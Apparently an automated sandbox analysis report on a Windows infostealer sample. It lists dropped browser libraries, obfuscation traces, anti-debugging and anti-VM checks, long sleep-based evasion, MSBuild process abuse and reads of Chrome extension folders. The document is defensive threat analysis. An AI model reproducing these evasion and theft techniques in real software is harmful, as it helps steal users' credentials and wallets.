Source: Binary string: nss3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

Data Obfuscation

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E7A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_003E7A40
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003ECDD5 push ecx; ret 0_2_003ECDE8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2CB536 push ecx; ret 0_2_6C2CB549
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054BCBC0 pushad ; retf 4_2_054BCBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0041CDD5 push ecx; ret 6_2_0041CDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE11BF9 push ecx; ret 6_2_1FFB4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE110C8 push ecx; ret 6_2_20013552
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, zcrmeG4DKc05Qj8A7l.cs High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, zcrmeG4DKc05Qj8A7l.cs High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'NvQOxwsIFR', 'QsUuklFoHUiQD', 'MCRoDX9te', 'l5EbFemhK', 'uwcnnhQXJ', 'J3PigtLyh', 'PwdNpFGeB', 'XCj67ZIOy', 'w09DYCs5D'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, zcrmeG4DKc05Qj8A7l.cs High entropy of concatenated method names: 'Ys7O1WDVbX', 'EIxO3RK2jf', 'ov3OzJmFFU', 'KJS0ILfinW', 'Gtt0O5H9rf', 'Gvj00KAYqN', 'hUG0r1tocH', 'PBb0lrpBsM', 'pGy05VOh0y', 'j3M0RfBB5l'
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\EHDHIDAEHC.exe Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\EHDHIDAEHC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: C:\ProgramData\EHDHIDAEHC.exe Memory allocated: 1360000 memory reserve | memory write watch
Source: C:\ProgramData\EHDHIDAEHC.exe Memory allocated: 2E60000 memory reserve | memory write watch
Source: C:\ProgramData\EHDHIDAEHC.exe Memory allocated: 4E60000 memory reserve | memory write watch
Source: C:\ProgramData\EHDHIDAEHC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe API coverage: 9.3 %
Source: C:\ProgramData\EHDHIDAEHC.exe TID: 6888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 2208 Thread sleep count: 78 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003D1110
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_003D99F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E5EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003E5EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003DC2E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_003DA2C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E56C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_003E56C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003DB390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E4F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 0_2_003E4F80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D9D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_003D9D40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E5A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_003E5A70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_003DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 6_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 6_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 6_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 6_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 6_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 6_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_0040B390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E53C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 0_2_003E53C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DFDA0 GetSystemInfo,wsprintfA, 0_2_003DFDA0
Source: C:\ProgramData\EHDHIDAEHC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr Binary or memory string: EZCZTtShhMhGfSxfdfH
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWE
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003220000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000031BE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware8p
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003ED12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003ED12F
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D2000 VirtualProtect 00000000,00000004,00000100,? 0_2_003D2000
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E7A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_003E7A40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E76E0 mov eax, dword ptr fs:[00000030h] 0_2_003E76E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_004176E0 mov eax, dword ptr fs:[00000030h] 6_2_004176E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E0420 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,wsprintfA,lstrcatA,GetCurrentHwProfileA,lstrlenA,lstrcatA, 0_2_003E0420
Source: C:\ProgramData\EHDHIDAEHC.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003EECC8 SetUnhandledExceptionFilter, 0_2_003EECC8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003ED12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003ED12F
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003ECAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003ECAF5
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C2CB66C
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C2CB1F7
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C47AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C47AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0041ECC8 SetUnhandledExceptionFilter, 6_2_0041ECC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0041D12F
